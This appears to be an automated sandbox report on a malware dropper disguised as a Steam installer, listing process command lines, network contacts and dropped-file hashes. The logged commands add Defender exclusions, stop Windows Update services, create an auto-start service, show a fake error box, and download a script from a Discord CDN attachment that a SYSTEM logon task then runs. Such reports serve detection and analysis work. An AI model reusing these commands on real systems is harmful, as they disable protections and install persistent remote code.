AHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB3AGUAdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdgB2AHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACgAJABmAG4AIAArACAAJABpAC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAnAC4AZQB4AGUAJwApACkAIAB9ACAAPAAjAHgAbABpACMAPgA="

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#atr#>[System.Windows.Forms.MessageBox]::Show('Error #819: Cannot start due to missing dependencies, please install all the dependencies required.','','OK','Error')<#bqs#>;

C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf0.exe

"C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf0.exe"

C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf1.exe

"C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf1.exe"

C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf2.exe

"C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf2.exe"

C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf3.exe

"C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf3.exe"

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\71F.tmp\720.tmp\721.bat C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf1.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\where.exe

where node

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'https://nodejs.org/dist/v20.12.2/node-v20.12.2-x64.msi' -OutFile 'nodejs-installer.msi'"

C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe

"C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe"

C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe

"C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\Steam" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1704,i,17492305837119228622,9809693347021956828,262144 --enable-features=kWebSQLAccess --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1696 /prefetch:2

C:\Windows\system32\cscript.exe

cscript.exe

C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe

"C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\Steam" --field-trial-handle=1900,i,17492305837119228622,9809693347021956828,262144 --enable-features=kWebSQLAccess --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1912 /prefetch:3

C:\Windows\system32\cscript.exe

cscript.exe //Nologo C:\Users\Admin\AppData\Local\Programs\Steam\resources\app.asar.unpacked\node_modules\regedit\vbs\regList.wsf A HKCU\Software\Valve\Steam

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "AAWUFTXN"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "AAWUFTXN" binpath= "C:\ProgramData\acspebqjhjkn\gjouiuwovvdx.exe" start= "auto"

C:\Windows\system32\msiexec.exe

msiexec /i nodejs-installer.msi /quiet

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\System32\MsiExec.exe

C:\Windows\System32\MsiExec.exe -Embedding 5453DF835A2D4F6CFD423D7C236B4A4C

C:\Windows\System32\MsiExec.exe

C:\Windows\System32\MsiExec.exe -Embedding 93111A9A2132C1A139112D7374CBE05B E Global\MSI0000

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 937633608C50D6DD62BD33707A723DB9

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'https://cdn.discordapp.com/attachments/1249224125830922300/1249224157745516664/index.js?ex=666dc668&is=666c74e8&hm=5dfd52c5327ffb2554e248dcb902443533012613ad4f330995dc83169665440c&' -OutFile 'C:\Users\Admin\AppData\Local\Temp\chrome2\index.js'"

C:\Windows\system32\schtasks.exe

schtasks /Create /SC ONLOGON /TN "RunNodeScriptAtLogon" /TR "node.exe 'C:\Users\Admin\AppData\Local\Temp\chrome2\index.js'" /RU SYSTEM /F

Network

Country Destination Domain Proto
US 8.8.8.8:53 rentry.org udp
FR 164.132.58.105:443 rentry.org tcp
US 8.8.8.8:53 bitbucket.org udp
US 104.192.141.1:443 bitbucket.org tcp
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 105.58.132.164.in-addr.arpa udp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 1.141.192.104.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 nodejs.org udp
US 104.20.22.46:443 nodejs.org tcp
US 8.8.8.8:53 46.22.20.104.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
DE 147.45.41.14:12428 tcp
US 8.8.8.8:53 14.41.45.147.in-addr.arpa udp
US 8.8.8.8:53 192.142.123.92.in-addr.arpa udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.4.4:443 dns.google tcp
US 8.8.8.8:53 4.4.8.8.in-addr.arpa udp
US 8.8.4.4:443 dns.google tcp
US 8.8.4.4:443 dns.google tcp
US 8.8.4.4:443 dns.google tcp
US 8.8.4.4:443 dns.google tcp
US 8.8.4.4:443 dns.google tcp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp
US 8.8.4.4:443 dns.google tcp
US 8.8.4.4:443 dns.google tcp
US 8.8.4.4:443 dns.google tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 233.134.159.162.in-addr.arpa udp
US 8.8.4.4:443 dns.google tcp
US 8.8.4.4:443 dns.google tcp

Files

memory/4808-1-0x00007FFCD9883000-0x00007FFCD9885000-memory.dmp

memory/4808-0-0x0000000000D80000-0x0000000000D88000-memory.dmp

memory/684-8-0x000002AF76440000-0x000002AF76462000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wng1rn1p.mxy.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/684-13-0x00007FFCD9880000-0x00007FFCDA341000-memory.dmp

memory/684-14-0x00007FFCD9880000-0x00007FFCDA341000-memory.dmp

memory/684-15-0x00007FFCD9880000-0x00007FFCDA341000-memory.dmp

memory/684-27-0x00007FFCD9880000-0x00007FFCDA341000-memory.dmp

C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf1.exe

MD5 232df1e89fad603c20a9dced57983322
SHA1 89347e16c723e4cc89a080066a632b9f48a26cb3
SHA256 3b5ea4dddab91d998e105206b8cffade1554b065b88e584360710b11a315bfd0
SHA512 1adc8603c0757daa7076fe2f6af7b88369841107c9cc964083e8e1fa90adff2b32f87278df48f53591161ce6507c9434a3426b6ec4532020d605495e1f9d2e5a

C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf2.exe

MD5 d3a0a9f2a3e80ac0b21989c1d5122944
SHA1 d329ff5a234047c101b5a17f6bc5fc8b796d0aa7
SHA256 cbf66a9ab4d8749f32b89d73d0bc5ffd56edf8b59e608270bd5c3f08764babe0
SHA512 40e651126f7d26442450e0069db1a55f9ad93df70c124ff6c900df61a762fd0e6b6c64e7196bd61b2c7d951996f8dd2e12c11f4151df8ccb03bbe21dbc30d2bf

C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf3.exe

MD5 90cc5edcb6a716028f11b8d8c2bd2871
SHA1 773576f73270f7f5e7f732abf71fabfacb721054
SHA256 367f7c935b60b0ecdf000d45174cf26cc9fed0cbf1bd35f519a175862e7c2911
SHA512 5750fd8c738116e44d328896f865ddb03bd3c37b61f9e4480103e0d113660730a608d352c866e3c048e8b6172fcf23f26d6cbc1a3a38a21f601e1dab6f8269bc

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 1c00ac32d3b954eb5f5c34f2665a1445
SHA1 aad5c1509fa3101313a44899e4cd25147388d465
SHA256 c32ae9f41c72d4f9aa3c203d5326a04049884713aa39c4af535a0632488d18c2
SHA512 c72b27d3a12a0ec9e6ada5a1cff1d1ea6bb53ae5fdf9c6c65ba1078ad3f86e6e01dfe2152431a8f6cd03de1f2ef712b545dc22706da391d081a3dce1228099f2

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 614f88cf39eb3223246afec4bf1463b4
SHA1 74d738ee6fdada75ac1ef1645073005e3f6b6cfb
SHA256 021636a793f57f23b16356c5b84fdf0122fdcadfaba305e4df4654bfbfa442bd
SHA512 84a7151e0471e659699a15c25d9063af1975e79bb5f23de6b3bc0d3b96cd161d70ad35f6acdbc8123b38bac9918df8b202bd6f1f4ca8061919074973e6063a77

memory/684-72-0x00007FFCD9880000-0x00007FFCDA341000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\nsw8F5.tmp\System.dll

MD5 0d7ad4f45dc6f5aa87f606d0331c6901
SHA1 48df0911f0484cbe2a8cdd5362140b63c41ee457
SHA256 3eb38ae99653a7dbc724132ee240f6e5c4af4bfe7c01d31d23faf373f9f2eaca
SHA512 c07de7308cb54205e8bd703001a7fe4fd7796c9ac1b4bb330c77c872bf712b093645f40b80ce7127531fe6746a5b66e18ea073ab6a644934abed9bb64126fea9

C:\Users\Admin\AppData\Local\Temp\nsw8F5.tmp\StdUtils.dll

MD5 c6a6e03f77c313b267498515488c5740
SHA1 3d49fc2784b9450962ed6b82b46e9c3c957d7c15
SHA256 b72e9013a6204e9f01076dc38dabbf30870d44dfc66962adbf73619d4331601e
SHA512 9870c5879f7b72836805088079ad5bbafcb59fc3d9127f2160d4ec3d6e88d3cc8ebe5a9f5d20a4720fe6407c1336ef10f33b2b9621bc587e930d4cbacf337803

memory/4268-85-0x0000000000B10000-0x0000000000B80000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\nsw8F5.tmp\nsExec.dll

MD5 ec0504e6b8a11d5aad43b296beeb84b2
SHA1 91b5ce085130c8c7194d66b2439ec9e1c206497c
SHA256 5d9ceb1ce5f35aea5f9e5a0c0edeeec04dfefe0c77890c80c70e98209b58b962
SHA512 3f918f1b47e8a919cbe51eb17dc30acc8cfc18e743a1bae5b787d0db7d26038dc1210be98bf5ba3be8d6ed896dbbd7ac3d13e66454a98b2a38c7e69dad30bb57

memory/4268-89-0x00000000056E0000-0x00000000056FE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\nsw8F5.tmp\nsis7z.dll

MD5 80e44ce4895304c6a3a831310fbf8cd0
SHA1 36bd49ae21c460be5753a904b4501f1abca53508
SHA256 b393f05e8ff919ef071181050e1873c9a776e1a0ae8329aefff7007d0cadf592
SHA512 c8ba7b1f9113ead23e993e74a48c4427ae3562c1f6d9910b2bbe6806c9107cf7d94bc7d204613e4743d0cd869e00dafd4fb54aad1e8adb69c553f3b9e5bc64df

C:\Users\Admin\AppData\Local\Temp\71F.tmp\720.tmp\721.bat

MD5 271dec7719a77c4638942d8247d12033
SHA1 e06d0309acc948f47bd1d2c4ced15a165875e4b6
SHA256 33cd4ccab998f90c97b237fec669e31944906c70298187e506934877aa0605bd
SHA512 3b352583360edbd980ac6885e0fdf431231fc39f8da0553b0457914fb1a2276bf508e3a33dc629857e5d47acb20fcddadee1120b99eaadb761443e6ae7b27226

memory/4268-99-0x0000000005CF0000-0x0000000006294000-memory.dmp

memory/4268-100-0x0000000005830000-0x00000000058C2000-memory.dmp

memory/4268-111-0x0000000005810000-0x000000000581A000-memory.dmp

memory/4268-288-0x0000000008EF0000-0x0000000009508000-memory.dmp

memory/4268-290-0x0000000008990000-0x00000000089A2000-memory.dmp

memory/4268-289-0x0000000008A50000-0x0000000008B5A000-memory.dmp

memory/4268-291-0x00000000089F0000-0x0000000008A2C000-memory.dmp

memory/4268-292-0x0000000008B60000-0x0000000008BAC000-memory.dmp

C:\Users\Admin\AppData\Local\Programs\Steam\chrome_100_percent.pak

MD5 6c2827fe702f454c8452a72ea0faf53c
SHA1 881f297efcbabfa52dd4cfe5bd2433a5568cc564
SHA256 2fb9826a1b43c84c08f26c4b4556c6520f8f5eef8ab1c83011031eb2d83d6663
SHA512 5619ad3fca8ea51b24ea759f42685c8dc7769dd3b8774d8be1917e0a25fa17e8a544f6882617b4faa63c6c4f29844b515d07db965c8ea50d5d491cdda7281fc5

C:\Users\Admin\AppData\Local\Temp\nsw8F5.tmp\7z-out\chrome_200_percent.pak

MD5 77088f98a0f7ea522795baec5c930d03
SHA1 9b272f152e19c478fcbd7eacf7356c3d601350ed
SHA256 83d9243037b2f7e62d0fdfce19ca72e488c18e9691961e2d191e84fb3f2f7a5d
SHA512 5b19115422d3133e81f17eedbacee4c8e140970120419d6bbfe0e99cf5528d513eea6583548fa8a6259b260d73fab77758ad95137b61fe9056101dd5772e8f4a

C:\Users\Admin\AppData\Local\Temp\nsw8F5.tmp\7z-out\resources.pak

MD5 97770ebb513490dfb038bed3bc444128
SHA1 2e459ca458879ac8f427080764bb5d668a912235
SHA256 75e03df55d7d23c840c09288da270285f17d067cef8709252451c0a8aa1254f4
SHA512 7f41708f8f29f0a9730e461c7a5a6780824ec31dac6278abb2c42a50919c10e01ce00aa7e4cdef680d667c467bab4683df90d5db2c61aef8dfdf77c2eb3d8d24

C:\Users\Admin\AppData\Local\Temp\nsw8F5.tmp\7z-out\LICENSES.chromium.html

MD5 0ff177fbf2a3873dd573077840e0b8f5
SHA1 03d06bc7cd894399a5fc6600a0210f6e3226f92a
SHA256 c4771c9158e31855293ee565db76c9b2c52f84c8a37eda4700cfb149a17fd7eb
SHA512 3264becd3103c905ab7f9cc034320885f18cbecaa45f582a4a9567ca4bcd620d64dc59fb03532964e775c35f07928a4497f5529cf1b9dc18379e4e9cff02ff8a

C:\Users\Admin\AppData\Local\Temp\nsw8F5.tmp\7z-out\snapshot_blob.bin

MD5 0c13aba4e77dd56e5f7ec8f8fdd6c9a8
SHA1 e17eb5b549ac1389cf3761da7d2b2aede1c93fd9
SHA256 ca7012d6e1478bdd112c485844253e48ef43168c4267ba19be229f0ba2bd6994
SHA512 f7d49048af8f2dd58c4af0602bda888b948aeb0846f7f27dd7db873f4b185debf5edf3869f8e311e31865e2408aa93af4f0f67a4f1ca0554ff8a8f2fb9a1214a

C:\Users\Admin\AppData\Local\Temp\nsw8F5.tmp\7z-out\LICENSE.electron.txt

MD5 4d42118d35941e0f664dddbd83f633c5
SHA1 2b21ec5f20fe961d15f2b58efb1368e66d202e5c
SHA256 5154e165bd6c2cc0cfbcd8916498c7abab0497923bafcd5cb07673fe8480087d
SHA512 3ffbba2e4cd689f362378f6b0f6060571f57e228d3755bdd308283be6cbbef8c2e84beb5fcf73e0c3c81cd944d01ee3fcf141733c4d8b3b0162e543e0b9f3e63

C:\Users\Admin\AppData\Local\Temp\nsw8F5.tmp\7z-out\libGLESv2.dll

MD5 f9dbec54c402358bc32335d276c61a11
SHA1 915d3d2c3e34613b92c659d06616aae7fc92b0b2
SHA256 3621053e97fe245f77faab032ead47295219e17731f6114d6bc8109b756a8012
SHA512 5b0cb208bb9758af6b03b3becc765c9cea7325d333cfc957f3902be4547a8fdbcf40fba1911efe8e728020d83edceb4e40c6da7df9ea746f4c458e6cd3aa83f9

C:\Users\Admin\AppData\Local\Temp\nsw8F5.tmp\7z-out\libEGL.dll

MD5 9a13227a19d53f979ba43abefd64902e
SHA1 8432ea0550e72037dca3bc082f279e2178ba5154
SHA256 06bedf39f0f3369bbb0d97139cb0c899e7e0c040ffecd5f14d4e3383daa83005
SHA512 cf25b50132d820f6880f4dfeea2943d1d46b3dcab62529b0d13f8240b06400d30a8435eef6caa844e25ff5732469fa08c78723cc881d025bb0c3dc0d4f58a01e

C:\Users\Admin\AppData\Local\Temp\nsw8F5.tmp\7z-out\icudtl.dat

MD5 74bded81ce10a426df54da39cfa132ff
SHA1 eb26bcc7d24be42bd8cfbded53bd62d605989bbf
SHA256 7bf96c193befbf23514401f8f6568076450ade52dd1595b85e4dfcf3de5f6fb9
SHA512 bd7b7b52d31803b2d4b1fd8cb76481931ed8abb98d779b893d3965231177bdd33386461e1a820b384712013904da094e3cd15ee24a679ddc766132677a8be54a

C:\Users\Admin\AppData\Local\Temp\nsw8F5.tmp\7z-out\ffmpeg.dll

MD5 4be348449b9bcc9283d01a816202d3a7
SHA1 bacc9d93307ce382f800c4df693b24c9d00504af
SHA256 12febd3193d4e9b2fc5cc4839f468cd758f01aa358a04186c08f073b860d790c
SHA512 f567805ec2905d15bf3afc908478bc6243b3df2f118453a81362b10fdf4ed699e1d5d05687116c95698588d942a14d18f69ac1cda4a45cd2a09266c7b53176e4

C:\Users\Admin\AppData\Local\Temp\nsw8F5.tmp\7z-out\d3dcompiler_47.dll

MD5 a7b7470c347f84365ffe1b2072b4f95c
SHA1 57a96f6fb326ba65b7f7016242132b3f9464c7a3
SHA256 af7b99be1b8770c0e4d18e43b04e81d11bdeb667fa6b07ade7a88f4c5676bf9a
SHA512 83391a219631f750499fd9642d59ec80fb377c378997b302d10762e83325551bb97c1086b181fff0521b1ca933e518eab71a44a3578a23691f215ebb1dce463d

C:\Users\Admin\AppData\Local\Temp\nsw8F5.tmp\7z-out\v8_context_snapshot.bin

MD5 228cb75c5b14fb790ec913a34c12b4d6
SHA1 aa6dbfb6cd403be3110f85c2a3ae72ab575645fb
SHA256 bb9c5a66316280c3d90ad63e20e34a7311972632bfd927f9d192407c13714444
SHA512 ab6b94de633b71a99b58f3924b0b8a351e0899ccff0fdab35e06938ad22ed62548a331b0b296a886f67941a642fd32d00ec2297b0d687139c0e57d2919739c19

C:\Users\Admin\AppData\Local\Temp\nsw8F5.tmp\7z-out\vulkan-1.dll

MD5 57c1f36ece26d225f8bbf67abb5182db
SHA1 1b884a41c02c4cfc7f9dd74a9b31cc988ceace1b
SHA256 70c45cd778bacd5865fe20b478b2c259fc8651e41939216689c5f6fdc38bf8b2
SHA512 3b1e3ac0ab5563d001b8d72c53383a02bc20da1875deb1f5dbbeaccc4c4aa2392a1f768b13401d912ce91dfee2820886baf792a83c3343657a5b533436f4ee8b

C:\Users\Admin\AppData\Local\Temp\nsw8F5.tmp\7z-out\vk_swiftshader_icd.json

MD5 8642dd3a87e2de6e991fae08458e302b
SHA1 9c06735c31cec00600fd763a92f8112d085bd12a
SHA256 32d83ff113fef532a9f97e0d2831f8656628ab1c99e9060f0332b1532839afd9
SHA512 f5d37d1b45b006161e4cefeebba1e33af879a3a51d16ee3ff8c3968c0c36bbafae379bf9124c13310b77774c9cbb4fa53114e83f5b48b5314132736e5bb4496f

C:\Users\Admin\AppData\Local\Temp\nsw8F5.tmp\7z-out\vk_swiftshader.dll

MD5 eefa4c51a9ed3cf259a5ce20c3a8dd23
SHA1 16b8fb4f71df65f6ce8bed17ed8b5622bd9e8155
SHA256 23a307dc2d3848513827aae01b0dc51363f6c33e96a32860f6e397bb851b11a1
SHA512 7762f4bc0981f21048d0476e7875dbf43522eb786f0004c67bd6dfa00d70dd425687ca87dfb3a03ba80211fb25ba3acec24c5d101d8e2cb99f1dcb262b7cb12e

C:\Users\Admin\AppData\Local\Temp\nsw8F5.tmp\7z-out\locales\cs.pak

MD5 c942efb2a8c25205b66a056028a8bda7
SHA1 30b74bd9398e330ce5e4f4d3eb343a4e67ee0a41
SHA256 21916011c2668389727c8970e1407b9c0806812effab9552106da963951d9f27
SHA512 319fbdb304912b5628c0e5330416f000c6e0090e26a60ed8005a66aa5ba698892415ed3dd0e4f4ff8afce7986566d8557b76eed15e493f01f889b7a664180cf6

C:\Users\Admin\AppData\Local\Temp\nsw8F5.tmp\7z-out\locales\es.pak

MD5 fe679a1a0332b0f36183421a0a41a478
SHA1 7230d8646db57466b07a0d700db35838e5030481
SHA256 ea54cbe126cdd85b2799ad9600b86ca98c994e69251344163037139296ecea7c
SHA512 8b5da5c0e2c55a2dc849050a7d092c78d4bf4975c885ce69d360a0245b1f40bcc9c4cc6eac67d83a6e98f77eb84e1401fc025ccba058be94e962e6f6627c37fb

C:\Users\Admin\AppData\Local\Temp\nsw8F5.tmp\7z-out\locales\nl.pak

MD5 ed94cd5fe4846c197ebcdc3fb3dec939
SHA1 3239425517ebc508a449f3998036c21370685e32
SHA256 4736b7ec56cb845c14795e6e4fa98ddaba47c75aecec86e931f61222dff45ad9
SHA512 0f0a79ae99e8f74aab18c3673e640d4ea5f24d8b88a3ba63ea262da77ee3fe630296a818337c7b36b6603365f43c6f60720336fab9f594eb755f9c7efcdb8fe7

C:\Users\Admin\AppData\Local\Temp\nsw8F5.tmp\7z-out\locales\sw.pak

MD5 0787972a076c6690e7938758c2a92e24
SHA1 dbf02e5a3ae26acb060b533bb006756c19122bfe
SHA256 eb96ab83e2e08e811928742590178e97454863bc581dd8574d6a644fd3c6615a
SHA512 9f3560a3b648b1a7025cd8a98c39ec7634883aade1ac2c7836fde890cc04bd009aa5c1bca8354ee1259ebcd9482326c51a7d21bdee3caf92984ecbefab35d34c

C:\Users\Admin\AppData\Local\Temp\nsw8F5.tmp\7z-out\locales\sv.pak

MD5 d5925395fb791adebe0d06ce055ce976
SHA1 73163c7420f6a70ac7fcb52bb8cd97f4828a3ded
SHA256 bcd070d70a4284fd3144bf37c5e56994ca3a69c8f65aa72a9231748b30210e00
SHA512 6e0bf0f4d488eaf388431f05effced112e597be52b9c8f199c88ebb6e7e6a28d06f9a180ba3a9e7bf9da5166570077ed895249af7806db74343a64bb598a4260

C:\Users\Admin\AppData\Local\Temp\nsw8F5.tmp\7z-out\locales\uk.pak

MD5 8f894b4972b41dc4c7b65847ba856ff1
SHA1 63ce84840a90485fd376908c39a4125dfd53fc2d
SHA256 5dd2fcc64ef09be0775c2efe7e07dddfc18f5ba6059f878d0c22b9b0c2207cdc
SHA512 77ecdfcfd31803f308da51e6b2bbd47b7c0848104925b642cbcf877c6ee228c5c7e9dc7746a208d0640455daeeb6dfcbe954d7268119b9c096588deab3c2b53f

C:\Users\Admin\AppData\Local\Temp\nsw8F5.tmp\7z-out\resources\app.asar.unpacked\node_modules\regedit\vbs\regCreateKey.wsf

MD5 04e6d736dda6eec814e5bff7121a695c
SHA1 bcd113f9b374f977a81e52f1be21c35e9c815c74
SHA256 44201185e05845fef8b56ba9cea0194edffd89d0465b86e055292f84f19526c0
SHA512 6db255f72129f080dd259a3e7603cd1c21702a8810454c7935affe9a9f443a221a614a39cbfecfde1b2e13523992bbc8c222a0d763c018bc4ea10fda0cbfb468

C:\Users\Admin\AppData\Local\Temp\nsw8F5.tmp\7z-out\resources\app.asar.unpacked\node_modules\regedit\vbs\wsRegReadListStream.wsf

MD5 220b104f272214aa1c1c21463506e903
SHA1 5bda1b524f703190660d3c75a4eaad5e13f735fc
SHA256 48c9aeeb401d6bc509880d89c16ba6304f713f7039736d111ae2c4599a616998
SHA512 d2cca398acd24879197857fc1d31476daf4a2e82a417416c836213e9577ecb795c5d83f467022acd0ca617e55b22fe5bfda307f6612db1bf379fec7949d76bae

C:\Users\Admin\AppData\Local\Temp\nsw8F5.tmp\7z-out\resources\app.asar.unpacked\node_modules\regedit\vbs\wsRegReadList.wsf

MD5 bd0f81f4bb40b49305df5b581930d75e
SHA1 2303e8175f826e020bc64689b1139a0602cb0122
SHA256 c4e328d261837cb7d7937d717bb02800eb33e7d8de33e203fdc0f239844cb29f
SHA512 ddae510efc359fd2a89933fbf83840bc55d2877ba192bc766a3185e0e1dd15f4d5439cc2545536902aec97fc3e0c9035f4ba7721873fc002ff88e02195a47aef

memory/4268-769-0x0000000009780000-0x00000000097E6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\nsw8F5.tmp\7z-out\resources\app.asar.unpacked\node_modules\regedit\vbs\util.vbs

MD5 93a94731c49a9061ee563decf2fe1388
SHA1 3c64e4a5f3f86d2d21c2fc93a763c1df9908e861
SHA256 d8ab1f1cfa9b8afaddf31f7f905e5bfdf01025e1c4168e0d4aeceff045fd2261
SHA512 fe93e3dbb17cda51ff89fb74daa68fbd45054d9846eeb5b5c47faad06ddff6d596e811a39a39fff9983b2caf2fcabccbf1165f710e9e3ed76919e2b702d6ca36

C:\Users\Admin\AppData\Local\Temp\nsw8F5.tmp\7z-out\resources\app.asar.unpacked\node_modules\regedit\vbs\regUtil.vbs

MD5 e2a96b441d2cb55d3f0dff04e605907c
SHA1 c4c353788a9d3710ab5ad327531c018b8c41ba81
SHA256 b35888252d3b2c6cc4c37d0f15311f1b4becbfbda7a766ccc38c6536ae0106b2
SHA512 9c3240c76aff8b7ef95862e0d889bf39542e6f9154423b2f73c098b9503d90fcf95d206b126da934b4ce18b08d34be9bd5b2acce2f833573eaab4df28a7a2718

C:\Users\Admin\AppData\Local\Temp\nsw8F5.tmp\7z-out\resources\app.asar.unpacked\node_modules\regedit\vbs\regPutValue.wsf

MD5 f41c18da4e7cbef3a564613c74eab95e
SHA1 b4fae739fe5fd97b398a6a5c95c2077e9c1070c0
SHA256 5d43ec5af7744fb1de15e4a3058305ecb3f20e9daa7315df6812be5571466272
SHA512 bad5443f288e2d84c05ac30045ea04b253779c377b0a5d401c53648b75c55a008faf7ef3f8cd944c2cf3130b897f144ba7c04a4b48c48f2c9753ed44b5a2f34b

C:\Users\Admin\AppData\Local\Temp\nsw8F5.tmp\7z-out\resources\app.asar.unpacked\node_modules\regedit\vbs\regListStream.wsf

MD5 9e16e93684909d901ea9dc300a3371df
SHA1 37876c009c65472a5e9dd46b673febb238193722
SHA256 da4e3cd96dcecbcb2ece2d1e35a8adcc7dbaf79cd7a843856f7ce2872304fc88
SHA512 0214051bb35dcdb1cec9d4835555b4da5d14120360eab5921e02ec805f35ff35d13a839e77b638f18cb793a4010c7212424391e8230620b3c7b4d9c9dbfea748

C:\Users\Admin\AppData\Local\Temp\nsw8F5.tmp\7z-out\resources\app.asar.unpacked\node_modules\regedit\vbs\regList.wsf

MD5 c57c91809118b64333bc73eddcfd429a
SHA1 33e6de2a7b41fe406ba1994cd45be673c19f0cce
SHA256 1d5b1dd86cac924a6acf746778020c46195e77750901eece4c954450c3bbb362
SHA512 4ca78a5b1d95503963b0bc7c70deb9041480f32b5e15cbc97f924e747689ab7c499bd153ba4f352513b2928faf2491dedfaffa4bef4daa37a29a32c5203a0a02

